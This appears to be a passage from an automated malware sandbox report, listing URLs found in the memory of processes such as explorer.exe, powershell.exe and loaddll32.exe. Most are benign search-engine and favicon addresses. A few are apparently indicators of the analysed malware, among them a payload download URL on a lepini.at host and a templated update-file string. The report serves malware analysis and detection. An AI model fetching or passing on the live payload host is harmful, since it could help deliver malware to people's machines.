            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 00000021.00000002.1158802140.0000000001464000.00000004.00000020.sdmpString found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat6
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: loaddll32.exe, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.419834945.000000000F559000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 0000001A.00000003.397786087.000002A59CD6E000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 0000001A.00000002.427201197.000002A5846D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: msapplication.xml.3.drString found in binary or memory: http://www.amazon.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
